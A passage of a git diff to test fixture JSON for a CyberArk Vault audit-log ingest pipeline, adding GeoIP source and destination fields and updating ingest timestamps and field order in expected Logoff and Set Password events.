\u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eLogoff\u003c/Message\u003e\\n \u003cGatewayStation\u003e67.43.156.13\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 
09:48:28\",\"IsoTimestamp\":\"2021-03-11T17:48:28Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"8\",\"Desc\":\"Logoff\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Logoff\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.2.2\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logoff\",\"GatewayStation\":\"67.43.156.13\"}}}", "code": "8", "kind": "event", @@ -831,6 +885,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, 
@@ -874,7 +937,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:37:11.641159200Z", + "ingested": "2021-12-14T14:42:41.147018609Z", "original": "\u003c5\u003e1 2021-03-11T17:49:06Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:49:06\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:49:06Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e8\u003c/MessageID\u003e\\n \u003cDesc\u003eLogoff\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMPGW_VAGRANT\u003c/Issuer\u003e\\n \u003cAction\u003eLogoff\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eLogoff\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 
09:49:06\",\"IsoTimestamp\":\"2021-03-11T17:49:06Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"8\",\"Desc\":\"Logoff\",\"Severity\":\"Info\",\"Issuer\":\"PSMPGW_VAGRANT\",\"Action\":\"Logoff\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logoff\",\"GatewayStation\":\"\"}}}", "code": "8", "kind": "event", @@ -899,6 +962,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.15", "ip": "67.43.156.15" }, 
@@ -942,7 +1014,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:37:11.641164600Z", + "ingested": "2021-12-14T14:42:41.147018949Z", "original": "\u003c5\u003e1 2021-03-14T12:57:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:57:20\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:57:20Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e8\u003c/MessageID\u003e\\n \u003cDesc\u003eLogoff\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eLogoff\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eLogoff\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 
05:57:20\",\"IsoTimestamp\":\"2021-03-14T12:57:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"8\",\"Desc\":\"Logoff\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Logoff\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logoff\",\"GatewayStation\":\"\"}}}", "code": "8", "kind": "event", @@ -967,10 +1039,28 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.15", "ip": "67.43.156.15" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, 
@@ -1019,7 +1109,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:37:11.641168500Z", + "ingested": "2021-12-14T14:42:41.147019277Z", "original": "\u003c5\u003e1 2021-03-14T13:49:36Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 06:49:36\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T13:49:36Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e8\u003c/MessageID\u003e\\n \u003cDesc\u003eLogoff\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eLogoff\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eLogoff\u003c/Message\u003e\\n \u003cGatewayStation\u003e67.43.156.15\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 
06:49:36\",\"IsoTimestamp\":\"2021-03-14T13:49:36Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"8\",\"Desc\":\"Logoff\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Logoff\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logoff\",\"GatewayStation\":\"67.43.156.15\"}}}", "code": "8", "kind": "event", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-88-set-password.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-88-set-password.log-expected.json index 9d7c7ab2acd..4694007379d 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-88-set-password.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-88-set-password.log-expected.json @@ -1,18 +1,6 @@ { "expected": [ { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "10.0.1.20", - "ip": "10.0.1.20" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "product": "Vault", "hostname": "VAULT", @@ -28,6 +16,11 @@ "10.0.1.20" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", 
@@ -44,28 +37,23 @@ "host": { "name": "VAULT" }, + "source": { + "address": "10.0.1.20", + "ip": "10.0.1.20" + }, "event": { "severity": 2, "action": "set password", - "ingested": "2021-12-09T13:37:13.320124300Z", + "ingested": "2021-12-14T14:42:42.969867619Z", "original": "\u003c5\u003e1 2021-03-04T19:16:19Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 04 11:16:19\",\"IsoTimestamp\":\"2021-03-04T19:16:19Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set Password\",\"Severity\":\"Info\",\"Issuer\":\"PVWAGWUser\",\"Action\":\"Set Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}", "code": "88", "kind": "event" - } - }, - { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "10.0.1.20", - "ip": "10.0.1.20" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "product": "Vault", "hostname": "VAULT", @@ -81,6 +69,11 @@ "10.0.1.20" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", 
@@ -97,14 +90,21 @@ "host": { "name": "VAULT" }, + "source": { + "address": "10.0.1.20", + "ip": "10.0.1.20" + }, "event": { "severity": 2, "action": "set password", - "ingested": "2021-12-09T13:37:13.320131800Z", + "ingested": "2021-12-14T14:42:42.969870517Z", "original": "\u003c5\u003e1 2021-03-04T19:16:19Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 04 11:16:19\",\"IsoTimestamp\":\"2021-03-04T19:16:19Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set Password\",\"Severity\":\"Info\",\"Issuer\":\"PVWAAppUser\",\"Action\":\"Set Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}", "code": "88", "kind": "event" - } + }, + "tags": [ + "preserve_original_event" + ] }, { "observer": { @@ -143,7 +143,7 @@ "event": { "severity": 2, "action": "set password", - "ingested": "2021-12-09T13:37:13.320135400Z", + "ingested": "2021-12-14T14:42:42.969870983Z", "original": "Mar 08 02:54:46 VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"no\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set Password\",\"Severity\":\"Info\",\"Issuer\":\"PVWAGWUser\",\"Action\":\"Set Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}", "code": "88", "kind": "event" 
@@ -153,18 +153,6 @@ ] }, { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "10.0.1.20", - "ip": "10.0.1.20" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "product": "Vault", "hostname": "VAULT", @@ -180,6 +168,11 @@ "10.0.1.20" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", @@ -196,28 +189,23 @@ "host": { "name": "VAULT" }, + "source": { + "address": "10.0.1.20", + "ip": "10.0.1.20" + }, "event": { "severity": 2, "action": "set password", - "ingested": "2021-12-09T13:37:13.320140200Z", + "ingested": "2021-12-14T14:42:42.969871378Z", "original": "\u003c5\u003e1 2021-03-10T08:29:19Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 00:29:19\",\"IsoTimestamp\":\"2021-03-10T08:29:19Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set Password\",\"Severity\":\"Info\",\"Issuer\":\"Prov_COMPONENTS\",\"Action\":\"Set Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}", "code": "88", "kind": "event" - } - }, - { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "10.0.1.20", - "ip": "10.0.1.20" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "product": "Vault", "hostname": "VAULT", @@ -233,6 +221,11 @@ "10.0.1.20" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", 
@@ -249,28 +242,23 @@ "host": { "name": "VAULT" }, + "source": { + "address": "10.0.1.20", + "ip": "10.0.1.20" + }, "event": { "severity": 2, "action": "set password", - "ingested": "2021-12-09T13:37:13.320145400Z", + "ingested": "2021-12-14T14:42:42.969871782Z", "original": "\u003c5\u003e1 2021-03-10T08:29:28Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 00:29:28\",\"IsoTimestamp\":\"2021-03-10T08:29:28Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set Password\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"Set Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}", "code": "88", "kind": "event" - } - }, - { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "67.43.156.13", - "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "product": "Vault", "hostname": "VAULT", @@ -286,6 +274,11 @@ "67.43.156.13" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", 
@@ -302,28 +295,32 @@ "host": { "name": "VAULT" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", + "ip": "67.43.156.13" + }, "event": { "severity": 2, "action": "set password", - "ingested": "2021-12-09T13:37:13.320150400Z", + "ingested": "2021-12-14T14:42:42.969872170Z", "original": "\u003c5\u003e1 2021-03-10T09:11:52Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:52\",\"IsoTimestamp\":\"2021-03-10T09:11:52Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set Password\",\"Severity\":\"Info\",\"Issuer\":\"PSMPApp_localhost.localdomain\",\"Action\":\"Set Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}", "code": "88", "kind": "event" - } - }, - { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "67.43.156.13", - "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "product": "Vault", "hostname": "VAULT", @@ -339,6 +336,11 @@ "67.43.156.13" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", 
@@ -355,28 +357,32 @@ "host": { "name": "VAULT" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", + "ip": "67.43.156.13" + }, "event": { "severity": 2, "action": "set password", - "ingested": "2021-12-09T13:37:13.320154900Z", + "ingested": "2021-12-14T14:42:42.969872565Z", "original": "\u003c5\u003e1 2021-03-10T09:11:52Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:52\",\"IsoTimestamp\":\"2021-03-10T09:11:52Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set Password\",\"Severity\":\"Info\",\"Issuer\":\"PSMPGW_localhost.localdomain\",\"Action\":\"Set Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}", "code": "88", "kind": "event" - } - }, - { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "67.43.156.13", - "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "product": "Vault", "hostname": "VAULT", @@ -392,6 +398,11 @@ "67.43.156.13" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", 
@@ -408,28 +419,32 @@ "host": { "name": "VAULT" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", + "ip": "67.43.156.13" + }, "event": { "severity": 2, "action": "set password", - "ingested": "2021-12-09T13:37:13.320159200Z", + "ingested": "2021-12-14T14:42:42.969873073Z", "original": "\u003c5\u003e1 2021-03-10T09:11:55Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:55\",\"IsoTimestamp\":\"2021-03-10T09:11:55Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set Password\",\"Severity\":\"Info\",\"Issuer\":\"PSMP_ADB_localhost.localdomain\",\"Action\":\"Set Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}", "code": "88", "kind": "event" - } - }, - { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "67.43.156.13", - "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "product": "Vault", "hostname": "VAULT", @@ -445,6 +460,11 @@ "67.43.156.13" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", 
@@ -461,28 +481,32 @@ "host": { "name": "VAULT" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", + "ip": "67.43.156.13" + }, "event": { "severity": 2, "action": "set password", - "ingested": "2021-12-09T13:37:13.320163200Z", + "ingested": "2021-12-14T14:42:42.969873500Z", "original": "\u003c5\u003e1 2021-03-10T18:46:47Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:46:47\",\"IsoTimestamp\":\"2021-03-10T18:46:47Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set Password\",\"Severity\":\"Info\",\"Issuer\":\"PSMApp_VAGRANT\",\"Action\":\"Set Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}", "code": "88", "kind": "event" - } - }, - { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "67.43.156.13", - "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "product": "Vault", "hostname": "VAULT", @@ -498,6 +522,11 @@ "67.43.156.13" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", 
@@ -514,28 +543,32 @@ "host": { "name": "VAULT" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.13", + "ip": "67.43.156.13" + }, "event": { "severity": 2, "action": "set password", - "ingested": "2021-12-09T13:37:13.320167Z", + "ingested": "2021-12-14T14:42:42.969873937Z", "original": "\u003c5\u003e1 2021-03-10T18:46:47Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:46:47\",\"IsoTimestamp\":\"2021-03-10T18:46:47Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set Password\",\"Severity\":\"Info\",\"Issuer\":\"PSMGw_VAGRANT\",\"Action\":\"Set Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}", "code": "88", "kind": "event" - } - }, - { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "67.43.156.14", - "ip": "67.43.156.14" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "product": "Vault", "hostname": "VAULT", @@ -551,6 +584,11 @@ "67.43.156.14" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", 
@@ -567,28 +605,32 @@ "host": { "name": "VAULT" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.14", + "ip": "67.43.156.14" + }, "event": { "severity": 2, "action": "set password", - "ingested": "2021-12-09T13:37:13.320171500Z", + "ingested": "2021-12-14T14:42:42.969874333Z", "original": "\u003c5\u003e1 2021-03-10T22:20:12Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:20:12\",\"IsoTimestamp\":\"2021-03-10T22:20:12Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set Password\",\"Severity\":\"Info\",\"Issuer\":\"PSMApp_ASR-WIN\",\"Action\":\"Set Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.14\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}", "code": "88", "kind": "event" - } - }, - { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "67.43.156.14", - "ip": "67.43.156.14" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "product": "Vault", "hostname": "VAULT", @@ -604,6 +646,11 @@ "67.43.156.14" ] }, + "log": { + "syslog": { + "priority": 5 + } + }, "cyberarkpas": { "audit": { "severity": "Info", 
@@ -620,28 +667,32 @@ "host": { "name": "VAULT" }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.14", + "ip": "67.43.156.14" + }, "event": { "severity": 2, "action": "set password", - "ingested": "2021-12-09T13:37:13.320176600Z", + "ingested": "2021-12-14T14:42:42.969874942Z", "original": "\u003c5\u003e1 2021-03-10T22:20:12Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:20:12\",\"IsoTimestamp\":\"2021-03-10T22:20:12Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set Password\",\"Severity\":\"Info\",\"Issuer\":\"PSMGw_ASR-WIN\",\"Action\":\"Set Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.14\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}", "code": "88", "kind": "event" - } - }, - { - "log": { - "syslog": { - "priority": 5 - } - }, - "source": { - "address": "67.43.156.13", 